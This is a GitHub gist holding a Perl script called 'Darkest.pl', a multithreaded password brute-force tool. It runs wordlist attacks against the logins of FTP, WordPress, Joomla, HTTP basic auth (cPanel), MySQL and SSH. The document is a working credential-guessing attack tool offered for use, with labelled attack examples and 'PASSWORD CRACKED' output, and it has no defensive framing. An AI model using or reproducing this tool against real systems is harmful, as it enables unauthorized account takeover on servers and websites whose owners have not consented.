Skip to content

Instantly share code, notes, and snippets.

@hc0d3r

hc0d3r/Darkest.pl

Last active December 20, 2015 11:39
Show Gist options
  • Save hc0d3r/6125516 to your computer and use it in GitHub Desktop.
Save hc0d3r/6125516 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Darkest.pl
#!/usr/bin/env perl
# Coder: MMxM [http://hc0der.blogspot.com]
# Gr33tz 2: Cyclone , UT0P|4 , Md.morpheus , Hacker Fts315 , n4sss , MauzZz[BR] , chokao , c0de_universal
use strict;
use warnings;
use threads;
use Net::FTP;
use DBI;
use LWP;
use Net::OpenSSH;
use DBD::mysql;
use Getopt::Long;
use threads::shared;
use WWW::Mechanize;
use Term::ANSIColor qw(:constants);
sub banner {
print '
'.BRIGHT_GREEN.'[+]'.RESET.' Darkest Brute-force By MMxM v1.3
'.BOLD BLUE.'[*]'.RESET.' Options:
-u | --user => name of user [example: admin]
-h | --host => Target [example: 127.0.0.1]
-w | --wordlist => Wordlist [example: /tmp/wordlist.txt]
-t | --threads => number of threads [example: 10]
-m | --module => module name [example: wordpress]
'.BRIGHT_GREEN.'[+]'.RESET.' list of modules:
'.BOLD BLUE.'[*]'.RESET.' ftp
'.BOLD BLUE.'[*]'.RESET.' wordpress
'.BOLD BLUE.'[*]'.RESET.' joomla
'.BOLD BLUE.'[*]'.RESET.' authbasic -> used by cpanel and protected diretories (htaccess)
'.BOLD BLUE.'[*]'.RESET.' mysql
'.BOLD BLUE.'[*]'.RESET.' ssh
'.BRIGHT_GREEN.'[+]'.RESET.' Examples of use:
$ ./dark.pl -u admin -h 127.0.0.1 -w wl.txt -t 50 -m ftp | FTP-ATTACK
$ ./dark.pl -u admin -h localhost/wp-login.php -w wl.txt -t 100 -m wordpress | WP-ATTACK
$ ./dark.pl -u admin -h localhost/administrator/ -w wl.txt -t 100 -m joomla | JOOMLA-ATTACK
$ ./dark.pl -u admin -h localhost:2082 -w wl.txt -t 100 -m authbasic | CPANEL-ATTACK
$ ./dark.pl -u admin -h localhost -w wl.txt -t 100 -m mysql | MYSQL-ATTACK
$ ./dark.pl -u admin -h 127.0.0.1 -w wl.txt -t 20 -m ssh | SSH-ATTACK
';
exit(1);
}
my($wordlist,$thr,$ini,$fin,@threads,$arq,$i,@a,$test);
our($user,$host,@aa,$type,$token);
GetOptions( 'u|user=s' => \$user,
'h|host=s' => \$host,
'w|wordlist=s' => \$wordlist,
'm|module=s' => \$type,
't|threads=i' => \$thr
) || die &banner;
if(defined($type)){
foreach('ftp','wordpress','joomla','authbasic','mysql','ssh'){
if($type eq $_){
$type = \&$type;
$test = 1;
last;
}
}
if(!defined($test)){
&banner;
}
} else {
&banner;
}
&banner if (!defined($user)) || (!defined($host)) || (!defined($wordlist)) || (!defined($thr));
open($arq,"<$wordlist") || die($!);
@a = <$arq>;
close($arq);
@aa = grep { !/^$/ } @a;
print "\n".BRIGHT_GREEN.'[+]'.RESET." Starting Attack";
print "\n".BRIGHT_GREEN.'[+]'.RESET." Host => $host";
print "\n".BRIGHT_GREEN.'[+]'.RESET." User => $user";
print "\n".BRIGHT_GREEN.'[+]'.RESET." Wordlist => $wordlist";
print "\n".BRIGHT_GREEN.'[+]'.RESET." Threads => $thr\n\n";
my $stop :shared = 0;
$ini = 0;
$fin = $thr - 1;
while(1){
@threads = ();
#die("\n\n".BRIGHT_GREEN."[+]".RESET." 100% complete\n\n") if $stop;
for($i=$ini;$i<=$fin;$i++){
push(@threads,$i);
}
foreach(@threads){
$_ = threads->create(\&brute);
}
foreach(@threads){
$_->join();
}
print("\n\n".BRIGHT_GREEN."[+]".RESET." 100% complete\n\n") if $stop;
exit(0) if $stop;
for($i=$ini;$i<=$fin;$i++){
#last if $stop;
print BOLD RED.'[-]'.RESET." Trying => $aa[$i]";# if(defined($aa[$i]));
}
$ini = $fin + 1;
$fin = $fin + $thr;
}
sub brute {
my $id = threads->tid();
threads->exit() if $stop;
$id--;
if(defined($aa[$id])){
&$type($aa[$id]);
} else {
$stop = 1;
}
}
sub ftp {
my($pass) = @_;
chomp($pass);
my $f = Net::FTP->new($host) || die($!);
if($f->login($user, $pass)){
$f->quit;
print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
$stop = 1;
} else {
$f->quit;
return;
}
}
sub mysql {
my($pass) = @_;
chomp($pass);
my $dsn = "dbi:mysql::$host:3306";
my $DBIconnect = DBI->connect($dsn, $user, $pass,{
PrintError => 0,
RaiseError => 0
});
if(!$DBIconnect){
return;
} else {
print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
$stop = 1;
}
}
sub authbasic {
my($pass) = @_;
chomp($pass);
if($host !~ /^(http|https):\/\//){
$host = 'http://'.$host;
}
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $host);
$req->authorization_basic($user, $_);
if($ua->request($req)->code == 401){
return;
} else {
print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
$stop = 1;
}
}
sub wordpress {
my($pass) = @_;
chomp($pass);
my $ua = new LWP::UserAgent;
if ($host !~ /^(http|https):\/\//){
$host = 'http://' . $host;
}
my $response = $ua->post($host,{
'log' => $user,
'pwd' => $pass,
'wp-submit' => 'Log in',
});
my $code = $response->code;
if($code =~ /302/){
print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
$stop = 1;
} else {
return;
}
}
sub joomla {
my($pass) = @_;
chomp($pass);
if ($host !~ /^(http|https):\/\//){
$host = 'http://' . $host;
}
my $mech = WWW::Mechanize->new();
$mech->get($host);
if($mech->content() =~ /([0-9a-fA-F]{32})/){
$token = $1;
} else {
die("\n[-] Error to get security token\n");
}
$mech->submit_form(
fields => {
username => $user,
passwd => $pass,
task => 'login',
$token => '1',
}
);
if($mech->content() !~ /com_categories/i){
return;
} else {
print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
$stop = 1;
}
}
sub ssh {
my($pass) = @_;
chomp($pass);
open(my $stderr_fh,'>>/dev/null') || die $!;
open(my $stdout_fh,'>>/dev/null') || die $!;
my %opts = (
user => $user,
passwd => $pass,
default_stderr_fh => $stderr_fh,
default_stdout_fh => $stdout_fh,
timeout => 20,
);
my $ssh = Net::OpenSSH->new($host,%opts);
if($ssh->error){
return;
} else {
print "\n\n\t".BRIGHT_GREEN.'[+]'.RESET." PASSWORD CRACKED: $pass\n";
$stop = 1;
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment